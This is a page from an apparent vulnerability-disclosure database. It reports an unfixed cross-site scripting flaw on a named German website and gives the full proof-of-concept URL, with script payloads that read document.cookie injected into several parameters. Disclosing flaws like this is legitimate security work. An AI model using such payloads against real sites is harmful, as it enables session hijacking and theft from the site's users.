logo
DATABASE RESOURCES PRICING ABOUT US

Unfixed XSS vulnerability at www.brunnen.de

Description

Security researcher kInGoFcHaOs, has submitted on 28/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.brunnen.de, which at the time of submission ranked 997285 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 08/07/2008. It is currently unfixed. If you believe that this security issue has been corrected, please send us an e-mail. Vulnerable URL: http://www.brunnen.de/content_builder.php?folder_id=%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E&ArcorKeywords=%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E&action=%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E%3C%22%3C%3Cscript%3Ealert(document.cookie)%3C/sCrIpT%3E&ArcorKeywords=%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E&land=de&referer_folder_id=35&nav_folder1=35&QUERY=%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%253C%2522%253C%253Cscript%253Ealert%28document.cookie%29%253C%2FsCrIpT%253E%26ArcorKeywords%3D%25253C%252522%25253C%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252FsCrIpT%25253E%25253C%252522%25253C%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252FsCrIpT%25253E%25253C%252522%25253C%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252FsCrIpT%25253E%25253C%252522%25253C%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252FsCrIpT%25253E&x=13&y=9